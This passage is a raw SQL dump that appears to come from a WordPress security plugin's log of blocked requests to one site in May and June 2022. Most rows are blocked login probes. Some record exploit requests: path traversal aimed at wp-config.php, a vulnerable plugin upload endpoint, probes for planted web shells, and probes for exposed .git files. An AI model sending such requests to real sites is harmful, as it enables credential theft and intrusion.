06:40:38','185.220.101.39','http://smithandsmith.co.za/contact/','httpbl',''),(6307,'2022-05-08 16:53:36','165.22.252.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(6308,'2022-05-09 08:51:04','125.212.225.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(6309,'2022-05-10 07:53:49','5.161.42.125','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6310,'2022-05-11 00:00:40','196.196.246.25','http://smithandsmith.co.za/contact/','httpbl',''),(6311,'2022-05-11 00:00:42','196.196.246.25','http://smithandsmith.co.za/contact/','httpbl',''),(6312,'2022-05-11 01:19:41','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6313,'2022-05-11 16:10:42','185.220.101.16','http://smithandsmith.co.za/contact/','httpbl',''),(6314,'2022-05-11 16:10:42','185.220.101.16','http://smithandsmith.co.za/','httpbl',''),(6315,'2022-05-11 16:10:44','45.12.134.107','http://smithandsmith.co.za/contact/','httpbl',''),(6316,'2022-05-11 16:10:46','45.12.134.107','http://smithandsmith.co.za/','httpbl',''),(6317,'2022-05-11 16:10:48','160.119.249.240','http://smithandsmith.co.za/contact/','httpbl',''),(6318,'2022-05-11 16:10:49','160.119.249.240','http://smithandsmith.co.za/','httpbl',''),(6319,'2022-05-11 16:10:51','185.212.149.103','http://smithandsmith.co.za/contact/','httpbl',''),(6320,'2022-05-11 16:10:52','185.212.149.103','http://smithandsmith.co.za/','httpbl',''),(6321,'2022-05-11 16:10:52','185.212.149.103','http://smithandsmith.co.za/','httpbl',''),(6322,'2022-05-11 17:15:33','128.199.21.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(6323,'2022-05-11 19:00:16','23.154.177.4','http://smithandsmith.co.za/contact/','httpbl',''),(6324,'2022-05-11 19:00:18','23.154.177.4','http://smithandsmith.co.za/','httpbl',''),(6325,'2022-05-11 19:00:20','94.140.114.216','http://smithandsmith.co.za/contact/','httpbl',''),(6326,'2022-05-11 19:00:23','23.129.64.149','http://smithandsmith.co.za/','httpbl',''),(6327,'2022-05-11 20:46:34','188.166.242.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(6328,'2022-05-11 20:46:34','188.166.242.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(6329,'2022-05-11 20:46:35','188.166.242.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(6330,'2022-05-11 21:58:50','185.220.101.17','http://smithandsmith.co.za/contact/','httpbl',''),(6331,'2022-05-11 21:58:52','185.220.101.17','http://smithandsmith.co.za/','httpbl',''),(6332,'2022-05-11 21:58:54','46.232.249.138','http://smithandsmith.co.za/contact/','httpbl',''),(6333,'2022-05-11 21:58:55','46.232.249.138','http://smithandsmith.co.za/','httpbl',''),(6334,'2022-05-12 01:31:42','185.220.103.116','http://smithandsmith.co.za/contact/','httpbl',''),(6335,'2022-05-12 01:31:53','45.128.133.242','http://smithandsmith.co.za/','httpbl',''),(6336,'2022-05-12 01:31:54','185.220.101.73','http://smithandsmith.co.za/contact/','httpbl',''),(6337,'2022-05-12 01:31:54','185.220.101.73','http://smithandsmith.co.za/','httpbl',''),(6338,'2022-05-12 01:31:55','185.220.101.6','http://smithandsmith.co.za/contact/','httpbl',''),(6339,'2022-05-12 01:31:58','185.220.101.6','http://smithandsmith.co.za/','httpbl',''),(6340,'2022-05-12 01:32:00','51.195.166.195','http://smithandsmith.co.za/contact/','httpbl',''),(6341,'2022-05-12 01:32:01','51.195.166.195','http://smithandsmith.co.za/','httpbl',''),(6342,'2022-05-12 01:32:02','51.195.166.195','http://smithandsmith.co.za/','httpbl',''),(6343,'2022-05-12 02:36:26','185.14.97.176','http://smithandsmith.co.za/xmlrpc.php','httpbl',''),(6344,'2022-05-12 05:02:37','103.171.180.165','https://smithandsmith.co.za/wp-login.php','404shield',''),(6345,'2022-05-12 06:38:12','209.141.55.26','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6346,'2022-05-12 06:38:13','209.141.55.26','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6347,'2022-05-12 06:38:14','209.141.55.26','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6348,'2022-05-12 07:45:52','89.58.38.0','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6349,'2022-05-12 07:45:54','89.58.38.0','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6350,'2022-05-12 07:45:54','89.58.38.0','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6351,'2022-05-12 07:45:59','185.195.71.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(6352,'2022-05-12 10:45:52','188.166.242.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(6353,'2022-05-12 10:45:52','188.166.242.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(6354,'2022-05-12 10:45:53','188.166.242.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(6355,'2022-05-12 13:29:45','176.37.35.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6356,'2022-05-12 13:29:45','176.37.35.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6357,'2022-05-12 13:29:45','176.37.35.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6358,'2022-05-13 02:12:43','203.229.155.49','https://smithandsmith.co.za/wp-login.php','404shield',''),(6359,'2022-05-13 14:34:52','69.16.238.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(6360,'2022-05-14 20:06:22','217.160.145.62','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6361,'2022-05-14 20:06:29','217.160.145.62','https://smithandsmith.co.za/wp-content/uploads/typehub/custom/fqvpxrdz/.sp3ctra_XO.php?Fox=d3wL7','404shield',''),(6362,'2022-05-14 20:06:33','217.160.145.62','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6363,'2022-05-14 20:55:03','62.197.136.102','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6364,'2022-05-14 20:55:08','62.197.136.102','https://smithandsmith.co.za/wp-content/uploads/typehub/custom/chgnksbz/.sp3ctra_XO.php?Fox=d3wL7','404shield',''),(6365,'2022-05-14 20:55:12','62.197.136.102','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6366,'2022-05-15 01:10:15','31.210.20.101','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6367,'2022-05-15 01:10:23','31.210.20.101','https://www.smithandsmith.co.za/wp-content/uploads/typehub/custom/gfuimrzh/.sp3ctra_XO.php?Fox=d3wL7','404shield',''),(6368,'2022-05-15 01:10:27','31.210.20.101','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6369,'2022-05-15 03:11:54','109.233.192.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(6370,'2022-05-15 07:41:37','207.154.195.143','https://smithandsmith.co.za/wp-login.php','404shield',''),(6371,'2022-05-15 09:51:56','185.56.80.65','http://smithandsmith.co.za/contact/','httpbl',''),(6372,'2022-05-15 09:51:59','185.56.80.65','http://smithandsmith.co.za/','httpbl',''),(6373,'2022-05-15 09:52:00','31.42.184.136','http://smithandsmith.co.za/contact/','httpbl',''),(6374,'2022-05-15 09:52:01','31.42.184.136','http://smithandsmith.co.za/','httpbl',''),(6375,'2022-05-15 19:35:38','185.56.11.161','https://smithandsmith.co.za/wp-login.php','404shield',''),(6376,'2022-05-15 22:16:45','135.181.60.228','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6377,'2022-05-15 22:17:37','135.181.60.228','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(6378,'2022-05-16 05:11:17','31.210.20.170','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6379,'2022-05-16 05:11:39','31.210.20.170','https://www.smithandsmith.co.za/wp-content/uploads/typehub/custom/ihfwuneo/.sp3ctra_XO.php?Fox=d3wL7','404shield',''),(6380,'2022-05-16 05:11:54','31.210.20.170','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6381,'2022-05-16 06:50:17','20.89.233.99','https://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php','404shield',''),(6382,'2022-05-16 11:52:49','188.215.235.89','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6383,'2022-05-16 15:12:08','185.220.100.244','http://smithandsmith.co.za/contact/','httpbl',''),(6384,'2022-05-16 15:12:08','185.220.100.244','http://smithandsmith.co.za/','httpbl',''),(6385,'2022-05-16 17:26:08','188.214.152.229','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6386,'2022-05-16 23:43:24','198.154.191.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(6387,'2022-05-16 23:51:38','51.91.7.5','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php','404shield',''),(6388,'2022-05-16 23:51:39','51.91.7.5','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(6389,'2022-05-16 23:51:40','51.91.7.5','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php','404shield',''),(6390,'2022-05-17 05:44:04','104.244.79.234','https://www.smithandsmith.co.za/.git/config','httpbl',''),(6391,'2022-05-17 05:44:06','171.25.193.25','http://www.smithandsmith.co.za/.git/config','httpbl',''),(6392,'2022-05-17 05:44:15','185.14.97.176','https://www.smithandsmith.co.za/.DS_Store','httpbl',''),(6393,'2022-05-17 05:44:16','185.243.218.41','http://smithandsmith.co.za/.git/config','httpbl',''),(6394,'2022-05-17 08:40:26','135.181.60.228','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6395,'2022-05-17 08:40:55','135.181.60.228','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(6396,'2022-05-17 16:39:02','5.135.136.181','https://smithandsmith.co.za/wp-login.php','404shield',''),(6397,'2022-05-17 18:48:25','159.65.157.154','https://smithandsmith.co.za/wp-login.php','404shield',''),(6398,'2022-05-18 01:41:14','218.208.12.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(6399,'2022-05-18 01:41:14','218.208.12.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(6400,'2022-05-18 01:41:14','218.208.12.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(6401,'2022-05-18 18:31:37','204.12.234.250','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(6402,'2022-05-18 18:32:11','204.12.234.250','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(6403,'2022-05-18 18:32:37','204.12.234.250','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6404,'2022-05-18 23:09:27','185.70.11.21','https://smithandsmith.co.za/wp-login.php','404shield',''),(6405,'2022-05-19 00:17:53','109.70.100.85','http://smithandsmith.co.za/contact/','httpbl',''),(6406,'2022-05-19 00:17:53','109.70.100.85','http://smithandsmith.co.za/','httpbl',''),(6407,'2022-05-19 01:34:35','206.123.140.38','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(6408,'2022-05-19 01:36:55','206.123.140.38','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(6409,'2022-05-19 01:38:36','206.123.140.38','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6410,'2022-05-19 05:29:10','185.56.80.65','http://smithandsmith.co.za/contact/','httpbl',''),(6411,'2022-05-19 05:29:10','185.56.80.65','http://smithandsmith.co.za/','httpbl',''),(6412,'2022-05-19 13:10:38','217.160.145.62','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6413,'2022-05-19 13:10:45','217.160.145.62','https://smithandsmith.co.za/wp-content/uploads/typehub/custom/lqugjcme/.sp3ctra_XO.php?Fox=d3wL7','404shield',''),(6414,'2022-05-19 13:10:49','217.160.145.62','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6415,'2022-05-19 16:53:49','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6416,'2022-05-19 21:29:55','143.198.110.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(6417,'2022-05-20 05:46:55','20.70.215.1','https://smithandsmith.co.za/wp-login.php','404shield',''),(6418,'2022-05-20 05:46:55','20.70.215.1','https://smithandsmith.co.za/wp-login.php','404shield',''),(6419,'2022-05-20 05:46:56','20.70.215.1','https://smithandsmith.co.za/wp-login.php','404shield',''),(6420,'2022-05-20 06:07:27','217.160.145.62','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6421,'2022-05-20 06:07:33','217.160.145.62','https://smithandsmith.co.za/wp-content/uploads/typehub/custom/efcurtrb/.sp3ctra_XO.php?Fox=d3wL7','404shield',''),(6422,'2022-05-20 06:07:35','217.160.145.62','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6423,'2022-05-20 08:26:37','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6424,'2022-05-20 16:50:29','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6425,'2022-05-21 01:23:40','122.17.148.164','https://smithandsmith.co.za/wp-login.php','404shield',''),(6426,'2022-05-21 07:14:51','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6427,'2022-05-21 15:30:25','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6428,'2022-05-21 15:58:20','65.108.134.53','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(6429,'2022-05-21 15:59:02','65.108.134.53','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(6430,'2022-05-21 16:00:19','65.108.134.53','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6431,'2022-05-21 17:26:32','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6432,'2022-05-21 19:41:04','194.135.119.12','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6433,'2022-05-22 01:31:16','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6434,'2022-05-22 01:38:41','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6435,'2022-05-22 06:49:24','45.77.229.164','https://smithandsmith.co.za/wp-login.php','404shield',''),(6436,'2022-05-22 10:02:11','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6437,'2022-05-22 11:34:21','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6438,'2022-05-22 11:42:49','194.135.119.12','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6439,'2022-05-22 18:11:26','161.35.146.52','https://smithandsmith.co.za/wp-login.php','404shield',''),(6440,'2022-05-22 18:45:13','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6441,'2022-05-22 20:29:32','80.251.219.111','https://smithandsmith.co.za/wp-login.php','404shield',''),(6442,'2022-05-22 20:52:51','185.220.102.249','https://smithandsmith.co.za/contact','httpbl',''),(6443,'2022-05-22 20:52:53','185.220.102.249','https://smithandsmith.co.za/','httpbl',''),(6444,'2022-05-22 21:37:55','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6445,'2022-05-23 01:20:22','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6446,'2022-05-23 03:19:13','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6447,'2022-05-23 07:39:03','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6448,'2022-05-23 10:51:02','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6449,'2022-05-23 12:00:37','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6450,'2022-05-23 16:28:22','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6451,'2022-05-23 17:50:14','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6452,'2022-05-23 18:28:53','45.119.213.225','https://smithandsmith.co.za/wp-login.php','404shield',''),(6453,'2022-05-23 20:32:42','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6454,'2022-05-23 23:49:28','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6455,'2022-05-24 04:02:47','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6456,'2022-05-24 07:42:08','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6457,'2022-05-24 09:10:07','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6458,'2022-05-24 13:48:25','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6459,'2022-05-24 14:09:41','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6460,'2022-05-24 15:25:16','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6461,'2022-05-24 19:56:43','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6462,'2022-05-24 19:56:55','171.244.201.17','https://smithandsmith.co.za/wp-login.php','404shield',''),(6463,'2022-05-24 21:06:09','92.205.56.212','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6464,'2022-05-24 21:35:44','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6465,'2022-05-24 22:34:35','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6466,'2022-05-25 04:54:08','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6467,'2022-05-25 05:09:12','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6468,'2022-05-25 05:33:17','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6469,'2022-05-25 07:35:42','212.115.42.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(6470,'2022-05-25 08:53:10','47.94.18.241','https://smithandsmith.co.za/wp-admin/wp-login.php','404shield',''),(6471,'2022-05-25 12:20:55','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6472,'2022-05-25 12:59:56','185.174.159.43','http://smithandsmith.co.za/contact/','httpbl',''),(6473,'2022-05-25 12:59:57','185.174.159.43','http://smithandsmith.co.za/','httpbl',''),(6474,'2022-05-25 12:59:57','185.174.159.43','http://smithandsmith.co.za/','httpbl',''),(6475,'2022-05-25 13:35:07','157.245.107.81','https://smithandsmith.co.za/wp-login.php','404shield',''),(6476,'2022-05-25 17:32:40','150.95.110.113','https://smithandsmith.co.za/wp-login.php','404shield',''),(6477,'2022-05-25 19:47:14','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6478,'2022-05-26 03:13:15','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6479,'2022-05-26 04:51:27','138.128.173.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(6480,'2022-05-26 05:56:13','192.187.118.90','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(6481,'2022-05-26 05:57:16','192.187.118.90','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(6482,'2022-05-26 05:59:42','192.187.118.90','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6483,'2022-05-26 08:06:04','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6484,'2022-05-26 08:43:06','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6485,'2022-05-26 10:38:52','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6486,'2022-05-26 14:04:57','185.220.101.79','http://smithandsmith.co.za/contact/','httpbl',''),(6487,'2022-05-26 14:04:58','185.220.101.79','http://smithandsmith.co.za/','httpbl',''),(6488,'2022-05-26 15:02:34','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6489,'2022-05-26 15:40:33','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6490,'2022-05-26 17:59:44','156.146.55.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6491,'2022-05-26 21:57:55','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6492,'2022-05-26 22:50:50','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6493,'2022-05-27 02:40:03','46.161.27.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(6494,'2022-05-27 05:09:09','86.106.74.213','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6495,'2022-05-27 05:42:05','196.244.192.232','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6496,'2022-05-27 14:17:36','92.53.118.39','https://smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt','404shield',''),(6497,'2022-05-27 17:32:07','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6498,'2022-05-27 17:32:21','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6499,'2022-05-27 17:42:31','185.185.134.118','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6500,'2022-05-27 19:04:17','178.18.240.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(6501,'2022-05-27 22:45:39','20.205.139.105','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6502,'2022-05-27 22:45:58','20.205.139.105','https://smithandsmith.co.za/wp-login.php','404shield',''),(6503,'2022-05-27 22:46:00','20.205.139.105','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6504,'2022-05-28 01:43:54','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6505,'2022-05-28 01:46:47','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6506,'2022-05-28 03:09:07','20.216.13.211','https://smithandsmith.co.za/wp-admin/includes/class-wp-media-list-data.php','404shield',''),(6507,'2022-05-28 03:09:46','20.216.13.211','https://smithandsmith.co.za/wp-content/fw.php','404shield',''),(6508,'2022-05-28 03:09:48','20.216.13.211','https://smithandsmith.co.za/wp-content/fx.php','404shield',''),(6509,'2022-05-28 03:10:54','185.185.134.118','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6510,'2022-05-28 09:26:28','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6511,'2022-05-28 09:30:25','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6512,'2022-05-28 12:06:55','185.185.134.118','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6513,'2022-05-28 17:42:54','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6514,'2022-05-28 17:43:02','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6515,'2022-05-28 18:46:18','123.31.41.38','https://smithandsmith.co.za/wp-login.php','404shield',''),(6516,'2022-05-28 22:14:26','196.244.192.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6517,'2022-05-29 02:18:58','196.244.192.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6518,'2022-05-29 02:19:16','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6519,'2022-05-29 02:19:49','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6520,'2022-05-29 09:39:01','2.56.57.26','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6521,'2022-05-29 09:39:15','2.56.57.26','https://smithandsmith.co.za/wp-content/uploads/typehub/custom/vccdjamu/.sp3ctra_XO.php?Fox=d3wL7','404shield',''),(6522,'2022-05-29 09:39:23','2.56.57.26','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6523,'2022-05-29 10:32:01','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6524,'2022-05-29 10:36:42','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6525,'2022-05-29 11:34:15','196.244.192.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6526,'2022-05-29 14:49:09','34.232.199.192','https://smithandsmith.co.za/wp-login.php','404shield',''),(6527,'2022-05-29 16:09:04','178.18.136.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(6528,'2022-05-29 19:05:14','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6529,'2022-05-29 19:36:32','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6530,'2022-05-30 03:43:24','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6531,'2022-05-30 03:51:21','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6532,'2022-05-30 07:44:19','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6533,'2022-05-30 12:11:58','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6534,'2022-05-30 12:16:16','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6535,'2022-05-30 16:36:26','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6536,'2022-05-30 17:21:27','190.8.178.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(6537,'2022-05-30 20:48:37','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6538,'2022-05-30 20:58:23','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6539,'2022-05-31 01:40:31','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6540,'2022-05-31 05:18:27','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6541,'2022-05-31 05:20:26','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6542,'2022-05-31 08:32:24','20.83.26.154','https://smithandsmith.co.za/wp-content/themes/sketch/404.php','404shield',''),(6543,'2022-05-31 08:33:12','20.83.26.154','https://smithandsmith.co.za/wp-content/themes/twentyfive/include.php','404shield',''),(6544,'2022-05-31 10:43:53','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6545,'2022-05-31 13:34:19','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6546,'2022-05-31 13:41:30','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6547,'2022-05-31 20:27:22','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6548,'2022-05-31 20:55:51','144.172.73.66','https://smithandsmith.co.za/contact/','httpbl',''),(6549,'2022-05-31 20:55:56','51.195.166.195','https://smithandsmith.co.za/contact','httpbl',''),(6550,'2022-05-31 20:55:58','51.195.166.195','https://smithandsmith.co.za/','httpbl',''),(6551,'2022-05-31 22:09:25','194.242.10.226','https://smithandsmith.co.za/wp-login.php','404shield',''),(6552,'2022-05-31 22:09:55','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6553,'2022-05-31 22:12:38','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6554,'2022-06-01 06:30:37','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6555,'2022-06-01 06:32:42','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6556,'2022-06-01 07:14:44','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6557,'2022-06-01 14:59:05','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6558,'2022-06-01 15:00:52','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6559,'2022-06-01 18:01:35','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6560,'2022-06-01 18:12:42','104.236.45.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(6561,'2022-06-01 23:37:45','84.247.48.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6562,'2022-06-01 23:38:15','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6563,'2022-06-02 04:48:58','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6564,'2022-06-02 09:51:34','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6565,'2022-06-02 11:04:29','178.128.23.47','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6566,'2022-06-02 12:49:33','185.107.47.215','http://smithandsmith.co.za/contact/','httpbl',''),(6567,'2022-06-02 14:54:46','103.56.112.76','https://smithandsmith.co.za/wp-login.php','404shield',''),(6568,'2022-06-02 14:59:18','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6569,'2022-06-02 15:36:14','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6570,'2022-06-02 15:51:02','13.81.28.183','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6571,'2022-06-02 18:21:06','141.94.174.209','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(6572,'2022-06-02 18:31:18','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6573,'2022-06-02 20:39:46','35.213.170.208','https://smithandsmith.co.za/wp-login.php','404shield',''),(6574,'2022-06-02 23:01:56','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6575,'2022-06-03 02:17:34','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6576,'2022-06-03 03:19:27','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6577,'2022-06-03 04:52:34','46.161.27.204','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(6578,'2022-06-03 07:11:47','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6579,'2022-06-03 